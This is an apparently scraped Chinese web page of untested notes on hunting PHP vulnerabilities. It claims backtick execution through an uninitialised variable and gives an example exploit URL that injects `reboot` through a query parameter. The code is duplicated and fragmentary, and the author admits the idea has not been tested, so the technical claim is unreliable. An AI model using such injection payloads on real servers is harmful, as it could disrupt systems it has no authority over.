您现在的位置是:网站首页> 编程资料编程资料
PHP漏洞挖掘的一点思路 _安全教程_网络安全_
2023-05-24
263人已围观
简介 PHP漏洞挖掘的一点思路 _安全教程_网络安全_
$now1 = `date`;
echo "Now date is: $now1";
?> /*
利用PHP的反引号` (不明白的自己查资料反引号"`"的作用)
如果 $sec 变量未赋初值,可能导致 shell_exec 执行系统指令
*/ echo "$sec"; // 同理这个也可能. echo $sec;
?> EXP:
http://forum.eviloctal.com/exp.php?sec=`reboot`
这样只会把 $sec 当作变量来处理, 需要适当的变通一下。。。 今天翻书时无意间发现的,还没测试,有兴趣的朋友可以研究下。 PS:
变量在内存中初始化,一直保存在内存中。 未unset, 就可以读取!
echo "Now date is: $now1";
?> /*
利用PHP的反引号` (不明白的自己查资料反引号"`"的作用)
如果 $sec 变量未赋初值,可能导致 shell_exec 执行系统指令
*/ echo "$sec"; // 同理这个也可能. echo $sec;
?> EXP:
http://forum.eviloctal.com/exp.php?sec=`reboot`
这样只会把 $sec 当作变量来处理, 需要适当的变通一下。。。 今天翻书时无意间发现的,还没测试,有兴趣的朋友可以研究下。 PS:
变量在内存中初始化,一直保存在内存中。 未unset, 就可以读取!
相关内容
- server2008共享设置、服务器共享文件设置、服务器设置共享文件夹的方法详细介绍_安全教程_网络安全_
- 教你数据库挂马 _安全教程_网络安全_
- 大势至共享文件监控软件、共享文件权限管理软件主控端与客户端的连接设置方法详解_安全教程_网络安全_
- 基于Windows入门级IDS构建过程详述 _安全教程_网络安全_
- 为何黑客要挟制路由器DNS 用户该怎样实时发觉和防备方法_安全教程_网络安全_
- ASP搜索型注入 _安全教程_网络安全_
- Windows 0day EternalBlue(永恒之蓝)漏洞病毒预警及预防措施_安全教程_网络安全_
- 看黑客是如何黑了落伍者的(图) _安全教程_网络安全_
- [不断更新]"永恒之蓝"勒索病毒防护全攻略再也不用拔网线了_安全教程_网络安全_
- WordPress 2.6.1 SQL Column Truncation Vulnerability _安全教程_网络安全_
